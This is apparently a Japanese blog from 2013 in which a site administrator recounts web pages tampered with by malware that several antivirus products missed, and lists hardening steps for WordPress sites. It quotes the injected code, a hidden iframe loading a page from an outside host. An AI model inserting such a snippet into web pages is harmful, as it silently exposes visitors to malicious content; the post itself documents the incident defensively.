MaAfee、トレンドマイクロ、ノートン、そしてGoogleウェブマスターツールまで検知しないマルウェアに改ざんされているホームページは、本日ホスティングサーバー会社から下記の連絡を受け閉鎖されました。
----
被害拡大を防ぐため、該当ファイルのパーミッションを「000」へ変更いたしました。
----
改ざんされたホームページに、Wordpressはインストールされていませんでしたが、管理用にphpを使っていました。その階層のindex.phpにトロイ系のソースが仕込まれ、それがhtmlファイルを改ざんした主犯のような気がします。
結局、Googleのウェブマスタツールはこのマルウェアを検知できませんでした。今まで、このツールで数百ものホームページをチェックしていたので、改ざんをチェックできないマルウェアの存在は正直ショックです。
改ざん対策の現時点での総括
Wordpressは以下を実行
最新バージョンにする
※自動更新ではなく手動でおこなう。自動で行う場合、パーミッションの変更をFTPで行わなければならないので、むしろ手間になる。
パーミッションの変更
phpのパーミッションは604(config.phpは404)
ディレクトリは705
htaccessは604
WAFを導入する
WAFをオンにすると、動作しなくなる機能(プラグイン)がある。
定期的にファイルのデイトスタンプをチェックする。特にindex.phpの育成日付はチェック要。
当然ですが、バックアップはこまめに行う。
2013年5月11日土曜日
2013年5月6日月曜日
改ざんのあったホスティング
改ざんはどんなに対策を施しても避けられないと、最近は感じています。
仕事の関係で多くのレンタルサーバー会社のサーバーを取り扱っています。2年前にまず、ヘテムル、1年前にロリポップ、CPIとネットラピュタ等が改ざんされました。
ヘテムルの時は最悪でした、マルチィドメインで約30ドメイン活用していてすべてが改ざんされました。侵入口はWordpressです。バックアップがあるにせよ、すべて復旧させるのは非常に手間のかかることでした。正直、サーバーの移転を考えました。
ところが、当たり前のことですが、サーバー会社を変えても対策をしていなかったら、また改ざんされる可能性が高いことを知りました。ヘテムル側の対応は大変親切で改ざんされたデータをすべて送ってくれましたので、継続してヘテムルを使用しています。
Wordpressがやっかいなのは、対策用にファイルのパーミッションを604、404、705に手作業で変えても自動アップグレードでまた、644、755に戻ってしまいます。アップグレードのたびに手作業でパーミッションを変更しなければなりません。
多くのホスティング業者はWordpressを売りにしているのですが、改ざん等の対策はユーザーの責任としています。
仕事の関係で多くのレンタルサーバー会社のサーバーを取り扱っています。2年前にまず、ヘテムル、1年前にロリポップ、CPIとネットラピュタ等が改ざんされました。
ヘテムルの時は最悪でした、マルチィドメインで約30ドメイン活用していてすべてが改ざんされました。侵入口はWordpressです。バックアップがあるにせよ、すべて復旧させるのは非常に手間のかかることでした。正直、サーバーの移転を考えました。
ところが、当たり前のことですが、サーバー会社を変えても対策をしていなかったら、また改ざんされる可能性が高いことを知りました。ヘテムル側の対応は大変親切で改ざんされたデータをすべて送ってくれましたので、継続してヘテムルを使用しています。
Wordpressがやっかいなのは、対策用にファイルのパーミッションを604、404、705に手作業で変えても自動アップグレードでまた、644、755に戻ってしまいます。アップグレードのたびに手作業でパーミッションを変更しなければなりません。
多くのホスティング業者はWordpressを売りにしているのですが、改ざん等の対策はユーザーの責任としています。
2013年5月3日金曜日
やっかいなマルウェア
MaAfee、トレンドマイクロ、ノートンなどの有名ウィルスソフトでも認識されないマルウェアがあるようです。
インターネットウィルスは自然界のインフルエンザに似ていて、常に進化し、それに対するワクチンを開発するように、対策が後手になります。
ケチなので私のPCは無料のAVASTでウィルス対策をしています。ところが、先日AVASTがトロイの木馬を検知しましたと、ある知人のURLにアクセスした際に警告を出しました。
知人はウイルスバスタが常時起動していて問題なくページを表示できると言うので、また、AVASTが誤認識したのだとその時は思いました。 念のため、FTPでデータのデイトスタンプをチェックしてみると、半年以上更新していないHTMLファイルがすべて1週間前の日付でアップデートされていました。
この2年間、Wordpressのphpファイルへの改ざん対策でうんざりしていましたが、どうやら、これは新手の改ざんではないか???
いずれにしてもhtmlへの改ざんは初めてでした。しかも、Googleのウェブマスターツールのマルウェア検知で、問題なしでした。
これは改ざんであっても無害なのか???
FTPでもファイルの中身を見ることができない。
一体、どんな改ざんがあるのだろう???
検索しても日本のサイトではこの現象は見当たらない。satan.phpの時もそうでした。
数日後、たまたま、英語サイトでオンラインチェックできるページを見つけました。
http://sitecheck.sucuri.net/scanner/
ここで知人のドメインを入力すると下記のマルウェアがあることがわかりました。
</html><iframe src="http://autopd.de/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/
どうやらautopd.deも改ざんされているようで、こんどはautopd.deチェックすると
ロシアのURLらしき記述が多数見つかりました。
Wordpressでの改ざんパターンに似ていますが、違いは「問題なし」で サイトへのアクセスが許可されていることです。
インターネットウィルスは自然界のインフルエンザに似ていて、常に進化し、それに対するワクチンを開発するように、対策が後手になります。
ケチなので私のPCは無料のAVASTでウィルス対策をしています。ところが、先日AVASTがトロイの木馬を検知しましたと、ある知人のURLにアクセスした際に警告を出しました。
知人はウイルスバスタが常時起動していて問題なくページを表示できると言うので、また、AVASTが誤認識したのだとその時は思いました。 念のため、FTPでデータのデイトスタンプをチェックしてみると、半年以上更新していないHTMLファイルがすべて1週間前の日付でアップデートされていました。
この2年間、Wordpressのphpファイルへの改ざん対策でうんざりしていましたが、どうやら、これは新手の改ざんではないか???
いずれにしてもhtmlへの改ざんは初めてでした。しかも、Googleのウェブマスターツールのマルウェア検知で、問題なしでした。
これは改ざんであっても無害なのか???
FTPでもファイルの中身を見ることができない。
一体、どんな改ざんがあるのだろう???
検索しても日本のサイトではこの現象は見当たらない。satan.phpの時もそうでした。
数日後、たまたま、英語サイトでオンラインチェックできるページを見つけました。
http://sitecheck.sucuri.net/scanner/
ここで知人のドメインを入力すると下記のマルウェアがあることがわかりました。
</html><iframe src="http://autopd.de/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/
どうやらautopd.deも改ざんされているようで、こんどはautopd.deチェックすると
ロシアのURLらしき記述が多数見つかりました。
Wordpressでの改ざんパターンに似ていますが、違いは「問題なし」で サイトへのアクセスが許可されていることです。
登録:
投稿 (Atom)